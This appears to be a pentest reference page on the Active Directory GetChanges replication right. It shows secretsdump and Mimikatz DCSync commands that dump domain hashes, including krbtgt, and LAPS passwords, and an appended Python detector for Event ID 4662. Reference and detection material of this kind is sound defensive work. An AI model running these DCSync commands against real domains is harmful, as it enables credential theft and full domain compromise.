GetChanges
Source principal holds the DS-Replication-Get-Changes extended right on the domain object. Alone this is not abusable → it requires GetChangesAll to perform DCSync.
Applies to: User/Group/Computer → Domain
This edge is not exploitable alone. Combine with
GetChangesAll → enables DCSync. Combine with GetChangesInFilteredSet → enables SyncLAPSPassword.
Linux Abuse
Verify current rights (confirm both GetChanges + GetChangesAll present)
bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get object '<domain-dn>' \
--attr nTSecurityDescriptor
If GetChangesAll is also held → perform DCSync
# Full domain dump
secretsdump.py -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>'
# Pass-the-Hash
secretsdump.py -outputfile 'dcsync' -hashes ':<ntlm-hash>' -dc-ip <dc-ip> '<domain>/<username>@<dc-ip>'
# Pass-the-Ticket
KRB5CCNAME=<ccache> secretsdump.py -k -no-pass -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>@<dc-hostname>'
# Single user
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user krbtgt
If GetChangesInFilteredSet is also held → SyncLAPSPassword
# Sync LAPS password for a specific computer
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user '<target-computer>$'
Windows Abuse
If combined with GetChangesAll → Mimikatz DCSync
mimikatz # lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz # lsadump::dcsync /domain:<domain> /all /csv
Invoke-Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /user:krbtgt"'
Check who else holds replication rights (to find additional paths)
# 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes (use 1131f6ad-... for Get-Changes-All)
$acl = (Get-Acl 'AD:\DC=<domain>,DC=<tld>').Access
$acl | Where-Object { $_.ObjectType -eq '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' } | Select IdentityReference
Opsec
- GetChanges alone is harmless, but a principal holding it together with GetChangesAll is a critical misconfiguration (DCSync)
- Event ID 4662 fires on the DC whenever replication rights are exercised
- Enumerate other principals holding these rights to identify additional paths
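Detection counterpart to the Event ID 4662 note above, as an added example that is not part of the original page or of any tool it names. It assumes 4662 events have been flattened to one key=value record per line using the Windows event field names (SubjectUserName, AccessMask, Properties), and that the Directory Service Access audit subcategory is enabled so the events exist at all; the sample records and the allow-list of accounts expected to replicate (DC computer accounts) are constructed.

```python
"""Flag 4662 events where replication rights are exercised by an unexpected principal."""
import re

# Control-access right GUIDs that show up in the Properties field of Event ID 4662.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"           # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"       # DS-Replication-Get-Changes-All
GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"  # ...-Get-Changes-In-Filtered-Set
CONTROL_ACCESS = 0x100  # AccessMask bit meaning "extended/control access right"

# Constructed sample records (not real telemetry): one DC replicating normally, a user
# performing DCSync, a service account syncing LAPS, a GetChanges-only read, and noise.
SAMPLE_EVENTS = [
    'EventID=4662 SubjectUserName=DC01$ AccessMask=0x100 Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"',
    'EventID=4662 SubjectUserName=jdoe AccessMask=0x100 Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"',
    'EventID=4662 SubjectUserName=svc-laps AccessMask=0x100 Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}"',
    'EventID=4662 SubjectUserName=jdoe AccessMask=0x100 Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"',
    'EventID=4662 SubjectUserName=jdoe AccessMask=0x20 Properties="{bf967a86-0de6-11d0-a285-00aa003049e2}"',
]

_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Turn a key=value record into a dict; quoted values keep their spaces."""
    return {k: v.strip('"') for k, v in _FIELD.findall(line)}


def classify(event, replica_accounts):
    """Return 'dcsync', 'laps-sync', 'get-changes-only' or None for one 4662 event.

    replica_accounts: lowercase sAMAccountNames allowed to replicate (DC$ accounts and
    the like). GetChanges on its own is not flagged, matching the Opsec note above.
    """
    if event.get("EventID") != "4662":
        return None
    if int(event.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
        return None  # not an extended-right access, so not replication
    props = event.get("Properties", "").lower()
    if GET_CHANGES not in props and GET_CHANGES_ALL not in props:
        return None
    if event.get("SubjectUserName", "").lower() in replica_accounts:
        return None  # expected replication partner
    if GET_CHANGES_ALL in props:
        return "dcsync"
    if GET_CHANGES_FILTERED in props:
        return "laps-sync"
    return "get-changes-only"


def find_unexpected_replication(lines, replica_accounts):
    """Return (principal, verdict) for every event worth an alert."""
    hits = []
    for line in lines:
        event = parse_event(line)
        verdict = classify(event, replica_accounts)
        if verdict in ("dcsync", "laps-sync"):
            hits.append((event["SubjectUserName"], verdict))
    return hits
```

Running `find_unexpected_replication(SAMPLE_EVENTS, {"dc01$"})` flags jdoe for DCSync and svc-laps for a LAPS sync while DC01$ and the GetChanges-only read stay quiet; in production, build the allow-list from the actual DC accounts and tune it to legitimate sync products rather than hard-coding names.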